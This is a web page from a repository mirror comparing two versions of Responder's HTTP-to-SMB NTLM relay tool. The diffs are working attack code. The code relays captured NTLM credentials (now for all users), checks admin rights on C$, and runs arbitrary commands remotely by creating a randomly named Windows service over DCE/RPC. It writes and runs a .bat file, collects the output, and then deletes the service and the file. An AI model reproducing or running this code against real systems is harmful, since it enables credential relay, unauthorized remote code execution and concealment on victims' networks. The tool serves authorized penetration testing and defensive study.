PenTest/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-12-06 12:41:31 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:v2.3.2.5
Branches Tags
PenTest:master PenTest:revert-216-smbv1ScanWorkAgain
PenTest:v3.1.7.0 PenTest:v3.1.6.0 PenTest:v3.1.5.0 PenTest:v3.1.4.0 PenTest:v3.1.3.0 PenTest:v3.1.2.0 PenTest:v3.1.1.0 PenTest:v3.0.9.0 PenTest:v3.0.8.0 PenTest:v3.0.7.0 PenTest:v3.0.6.0 PenTest:v3.0.5.0 PenTest:v3.0.4.0 PenTest:v3.0.3.0 PenTest:v3.0.2.0 PenTest:v3.0.1.0 PenTest:v3.0.0.0 PenTest:v2.3.4.0 PenTest:v2.3.3.9 PenTest:v2.3.3.8 PenTest:v2.3.3.7 PenTest:v2.3.3.6 PenTest:v2.3.3.5 PenTest:v2.3.3.4 PenTest:v2.3.3.3 PenTest:v2.3.3.2 PenTest:v2.3.3.1 PenTest:v2.3.3.0 PenTest:v2.3.2.8 PenTest:v2.3.2.7 PenTest:v2.3.2.6 PenTest:v2.3.2.5 PenTest:v2.3.2.4 PenTest:v2.3.2.3 PenTest:v2.3.2.2 PenTest:v2.3.2.1 PenTest:v2.3.2 PenTest:v2.3.1 PenTest:v2.3.0 PenTest:v2.1.4 PenTest:v2.1.3 PenTest:v2.1.2 PenTest:v2.1.1 PenTest:v2.1.0 PenTest:v2.0.9 PenTest:v2.0.8 PenTest:v2.0.7 PenTest:v2.0.6 PenTest:v2.0.5 PenTest:v2.0.4 PenTest:v2.0.3 PenTest:v2.0.2 PenTest:v2.0.1
...
compare: PenTest:v2.3.2.8
Branches Tags
PenTest:master PenTest:revert-216-smbv1ScanWorkAgain
PenTest:v3.1.7.0 PenTest:v3.1.6.0 PenTest:v3.1.5.0 PenTest:v3.1.4.0 PenTest:v3.1.3.0 PenTest:v3.1.2.0 PenTest:v3.1.1.0 PenTest:v3.0.9.0 PenTest:v3.0.8.0 PenTest:v3.0.7.0 PenTest:v3.0.6.0 PenTest:v3.0.5.0 PenTest:v3.0.4.0 PenTest:v3.0.3.0 PenTest:v3.0.2.0 PenTest:v3.0.1.0 PenTest:v3.0.0.0 PenTest:v2.3.4.0 PenTest:v2.3.3.9 PenTest:v2.3.3.8 PenTest:v2.3.3.7 PenTest:v2.3.3.6 PenTest:v2.3.3.5 PenTest:v2.3.3.4 PenTest:v2.3.3.3 PenTest:v2.3.3.2 PenTest:v2.3.3.1 PenTest:v2.3.3.0 PenTest:v2.3.2.8 PenTest:v2.3.2.7 PenTest:v2.3.2.6 PenTest:v2.3.2.5 PenTest:v2.3.2.4 PenTest:v2.3.2.3 PenTest:v2.3.2.2 PenTest:v2.3.2.1 PenTest:v2.3.2 PenTest:v2.3.1 PenTest:v2.3.0 PenTest:v2.1.4 PenTest:v2.1.3 PenTest:v2.1.2 PenTest:v2.1.1 PenTest:v2.1.0 PenTest:v2.0.9 PenTest:v2.0.8 PenTest:v2.0.7 PenTest:v2.0.6 PenTest:v2.0.5 PenTest:v2.0.4 PenTest:v2.0.3 PenTest:v2.0.2 PenTest:v2.0.1

7 Commits
v2.3.2.5 ... v2.3.2.8

Author SHA1 Message Date
lgandx
0713c0350f updated version number 2016-10-06 17:35:55 -03:00
lgandx
c6e401c229 Added: Now delete services on the fly. 2016-10-06 17:28:27 -03:00
lgandx
a814d0de81 Updated versions 2016-10-05 12:04:17 -03:00
lgandx
d81ef9c33a Added: Possibility to target all users. use 'ALL' with -u 2016-10-05 11:59:00 -03:00
lgandx
7054c60f38 Fixed minor bug 2016-10-04 23:09:26 -03:00
lgandx
196eded194 Minor fixes 2016-10-04 21:28:24 -03:00
lgandx
3d3a19f66b Using Trans pipes instead of read/writes & fixed low priv bug which drops you in a shell while the user has no rights 2016-10-04 21:19:08 -03:00
3 changed files with 212 additions and 104 deletions
Expand all files Collapse all files

2
settings.py
View File

@@ -20,7 +20,7 @@ import subprocess
from utils import *
__version__ = 'Responder 2.3.2.5'
__version__ = 'Responder 2.3.2.8'
class Settings:

238
tools/RelayHTTPSMB/HTTPRelayPacket.py
View File

@@ -324,6 +324,7 @@ class SMBTreeConnectData(Packet):
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class SMBNTCreateData(Packet):
fields = OrderedDict([
("Wordcount", "\x18"),
@@ -352,7 +353,6 @@ class SMBNTCreateData(Packet):
Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
self.fields["Bcc"] = struct.pack("<h",len(Data1))
class SMBReadData(Packet):
fields = OrderedDict([
("Wordcount", "\x0a"),
@@ -397,6 +397,56 @@ class SMBWriteData(Packet):
self.fields["DataLenLow"] = struct.pack("<h",len(str(self.fields["Data"])))
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Data"])))
class SMBTransDCERPC(Packet):
fields = OrderedDict([
("Wordcount", "\x10"),
("TotalParamCount", "\x00\x00"),
("TotalDataCount", "\x00\x00" ),
("MaxParamCount", "\x00\x00"),
("MaxDataCount", "\x00\x04"),
("MaxSetupCount", "\x00"),
("Reserved", "\x00\x00"),
("Flags", "\x00"),
("Timeout", "\x00\x00\x00\x00"),
("Reserved1", "\x00\x00"),
("ParamCount", "\x00\x00"),
("ParamOffset", "\x00\x00"),
("DataCount", "\x00\x00"),
("DataOffset", "\x00\x00"),
("SetupCount", "\x02"),
("Reserved2", "\x00"),
("OpNum", "\x26\x00"),
("FID", "\x00\x00"),
("Bcc", "\x00\x00"),
("Terminator", "\x00"),
("PipeName", "\\PIPE\\"),
("PipeTerminator", "\x00\x00"),
("Data", ""),
])
def calculate(self):
#Padding
if len(str(self.fields["Data"]))%2==0:
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
else:
self.fields["PipeTerminator"] = "\x00\x00\x00"
##Convert Path to Unicode first before any Len calc.
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
##Data Len
self.fields["TotalDataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
self.fields["DataCount"] = struct.pack("<h", len(str(self.fields["Data"])))
##Packet len
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["OpNum"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
self.fields["ParamOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
self.fields["DataOffset"] = struct.pack("<h", len(FindRAPOffset)+32)
##Bcc Buff Len
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
self.fields["Bcc"] = struct.pack("<h", len(BccComplete))
class SMBDCEData(Packet):
fields = OrderedDict([
("Version", "\x05"),
@@ -435,10 +485,10 @@ class SMBDCEPacketData(Packet):
("PacketType", "\x00"),
("PacketFlag", "\x03"),
("DataRepresent", "\x10\x00\x00\x00"),
("FragLen", "\x2c\x02"),
("FragLen", "\x00\x00"),
("AuthLen", "\x00\x00"),
("CallID", "\x00\x00\x00\x00"),
("AllocHint", "\x38\x00\x00\x00"),
("AllocHint", "\x00\x00\x00\x00"),
("ContextID", "\x00\x00"),
("Opnum", "\x0f\x00"),
("Data", ""),
@@ -458,14 +508,16 @@ class SMBDCESVCCTLOpenManagerW(Packet):
("MaxCount", "\x0f\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0f\x00\x00\x00"),
("MachineName", "\\\\169.220.1.11"),##This is not taken into consideration.
("MachineNameNull", "\x00\x00\x00\x00"),
("MachineName", ""),
("MachineNameNull", "\x00\x00"),
("DbPointer", "\x00\x00\x00\x00"),
("AccessMask", "\x3f\x00\x0f\x00"),
])
def calculate(self):
## Convert to UTF-16LE
self.fields["MaxCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
self.fields["ActualCount"] = struct.pack("<i",len(str(self.fields["MachineName"]))+1)
self.fields["MachineName"] = self.fields["MachineName"].encode('utf-16le')
class SMBDCESVCCTLCreateService(Packet):
@@ -476,7 +528,7 @@ class SMBDCESVCCTLCreateService(Packet):
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", "AyAGaxwLhCP"),
("MachineNameNull", "\x00\x00"),
("ReferentID", "\x9c\xfa\x9a\xc9"),
("ReferentID", "\x00\x00\x02\x00"),
("MaxCountRefID", "\x11\x00\x00\x00"),
("OffsetID", "\x00\x00\x00\x00"),
("ActualCountRefID", "\x11\x00\x00\x00"),
@@ -493,8 +545,16 @@ class SMBDCESVCCTLCreateService(Packet):
("BinPathName", ""),
("BinCMD", ""),
("BintoEnd", ""),
("BinPathNameNull", "\x00\x00"),
("Nullz", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
("BinCMDTerminator", "\x00\x00"),
("LoadOrderGroup", "\x00\x00\x00\x00"),
("TagID", "\x00\x00\x00\x00"),
("Dependencies", "\x00\x00\x00\x00"),
("DependenciesLen", "\x00\x00\x00\x00"),
("ServiceStartName", "\x00\x00\x00\x00"),
("Password", "\x00\x00\x00\x00"),
("PasswordLen", "\x00\x00\x00\x00"),
("Padding", "\x00\x00"),
])
def calculate(self):
@@ -514,13 +574,12 @@ class SMBDCESVCCTLCreateService(Packet):
File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
#That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
FinalCMD = "del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
#That is: echo cmd into random .bat file, run .bat file, delete the bat file (it's loaded in memory).
self.fields["FileName"] = ""#Reset it.
self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
self.fields["BinCMD"] = FinalCMD
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
self.fields["BintoEnd"] = "& %COMSPEC% /C "+File+" &exit"#make sure to exit when done.
BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
## Calculate first
@@ -540,9 +599,9 @@ class SMBDCESVCCTLCreateService(Packet):
class SMBDCESVCCTLOpenService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"),
("MaxCount", "\x00\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ActualCount", "\x00\x00\x00\x00"),
("ServiceName", ""),
("MachineNameNull", "\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
@@ -561,6 +620,17 @@ class SMBDCESVCCTLStartService(Packet):
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
])
class SMBDCESVCCTLDeleteService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class SMBDCESVCCTLCloseService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
])
class OpenAndX(Packet):
fields = OrderedDict([
("Wordcount", "\x0f"),
@@ -578,12 +648,11 @@ class OpenAndX(Packet):
("Reserved2", "\x00\x00\x00\x00"),
("Bcc", "\x0b\x00"),
("Terminator", ""),
("File", "\\hola.txt"),
("FileNull", "\x00"),#00 00
("File", "\\"),
("FileNull", "\x00"),
])
def calculate(self):
#self.fields["File"] = self.fields["File"].encode('utf-16le')
self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
class ReadRequest(Packet):
@@ -602,7 +671,7 @@ class ReadRequestAndX(Packet):
("Wordcount", "\x0C"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("AndXOffset", "\xde\xde"),#
("AndXOffset", "\xde\xde"),
("FID", "\x02\x40"),
("Offset", "\x00\x00\x00\x00"),
("MaxCountLow", "\xf0\xff"),
@@ -708,7 +777,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
## DCE/RPC Read.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f)
t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00")
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
@@ -716,121 +785,131 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
data = s.recv(2048)
## DCE/RPC SVCCTLOpenManagerW.
if data[8:10] == "\x2e\x00":
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x03\x00")#, MachineName="\\\\"+Host[0])
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=Host[0])
w.calculate()
x = SMBDCEPacketData(Data=w)
x.calculate()
t = SMBWriteData(FID=f,Data=x)
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLCreateService.
if data[8:10] == "\x2e\xb0":
print "[+] Server returned NT_STATUS_PIPE_DISCONNECTED, no admin rights on that pipe.\n"
return False
## DCE/RPC SVCCTLCreateService.
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
return False
#print "[+] Creating service"
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
ContextHandler = data[88:108]
## DCE/RPC Create Service.
if data[8:10] == "\x25\x00":
ContextHandler = data[84:104]
ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)])
ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)])
FileChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.bat'
FilePath = FileChars
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath, ReferentID="\x21\x03\x03\x00",BinCMD=Command)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler, ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars, FileName=FilePath,BinCMD=Command)
w.calculate()
x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
#print "[+] Creating service"
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x2e\x00":
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
return False
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0c\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars)
w.calculate()
x = SMBDCEPacketData(Opnum="\x10\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0d\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x2e\x00":
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
return False
ContextHandler = data[88:108]
head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x0e\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x13\x00",Data=w)
x.calculate()
t = SMBWriteData(Offset="\x9f\x01\x00\x00",FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC Read Answer.
if data[8:10] == "\x2f\x00":
head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x0f\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBReadData(FID=f,MaxCountLow="\x40\x02", MinCount="\x40\x02",Offset="\x82\x02\x00\x00")
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
return False
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n"
return False
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandler)
x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
x.calculate()
t = SMBTransDCERPC(FID=f,Data=x)
t.calculate()
packet0 = str(head)+str(t)
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
##Close FID Request
if data[8:10] == "\x25\x00":
head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
t = CloseRequest(FID = f)
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
##Tree connect c$
if data[8:10] == "\x2e\x00":
if data[8:10] == "\x04\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
return False
#print "[+] Command executed, grabbing output now."
Logs.info('Command executed:')
Logs.info(clientIP+","+Username+','+Command)
#time.sleep(1)#Maybe the command executed took some time..
#print "[+] Removing service.\n[+] Cleaning up files.\n"
#print "[+] Removing service.\n[+] Cleaning up output file.\n"
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate()
@@ -862,6 +941,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
time.sleep(1)#not found, command failed.
print "[+] The command failed."
return data
##ReadRequest.
## Need grab the size from Open And X and do it properly later. For now, only 65535 bytes printed.
if data[8:10] == "\x2d\x00":
@@ -906,3 +986,5 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
data = s.recv(2048)
return data

56
tools/RelayHTTPSMB/HTTPToSMBRelay.py
View File

@@ -20,7 +20,7 @@ from Finger import RunFinger
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
from socket import *
__version__ = "0.2"
__version__ = "0.5"
def UserCallBack(op, value, dmy, parser):
args=[]
@@ -55,7 +55,7 @@ def ShowWelcome():
print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CRTL-C or <Enter>.\033[1;31m\n'
print 'To kill this script hit CRTL-C.\033[1;31m\n'
print 'Use this script in combination with Responder.py for best results.'
print 'Do not to use Responder.py with -P set. This tool does the same'
print 'than -P but with cross-protocol NTLM relay. Always target a box '
@@ -127,7 +127,7 @@ def ParseHTTPHash(data, key, client):
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
print "[+] Received NTLMv1 hash from: %s"%(client)
if User in UserToRelay:
if User in UserToRelay or "ALL" in UserToRelay:
print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
return None, None
@@ -148,7 +148,7 @@ def ParseHTTPHash(data, key, client):
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
print "[+] Received NTLMv2 hash from: %s"%(client)
if User in UserToRelay:
if User in UserToRelay or "ALL" in UserToRelay:
print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
return None, None
@@ -264,35 +264,40 @@ def HTTPProxyRelay():
smbdata = s.recv(2048)
return smbdata, s, addr[0], Username, Domain
else:
return None, None, None, None, None
return None
else:
Response = WPAD_Auth_407_Ans()
conn.send(str(Response))
data = conn.recv(4096)
except:
return None, None, None, None, None
return None
def RunPsExec(Host):
data, s, clientIP, Username, Domain = HTTPProxyRelay()
if data == None:
GetCredentials = HTTPProxyRelay()
if GetCredentials == None:
return False
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder."
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
data, s, clientIP, Username, Domain = GetCredentials
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
## First, check if user has admin privs on C$:
## Tree Connect
if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#Verify if the target returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
@@ -301,16 +306,34 @@ def RunPsExec(Host):
## Fail Handling.
if data[8:10] == "\x75\x22":
print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or low privilege user.\n[+] Hashes were saved anyways in Responder/logs/ folder."
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
return False
return False
## NtCreateAndx
## Fail Handling.
if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned."
return False
## Tree Connect
if data[8:10] == "\x75\x00":
print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## Go to NtCreateAndx
if data[8:10] == "\x75\x00":
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
while True:
if data[8:10] == "\x75\x00":
thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
#thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
thread.start_new_thread(get_command, ())
while Cmd == "":
pass
@@ -359,3 +382,6 @@ if __name__ == '__main__':
main()
except:
raise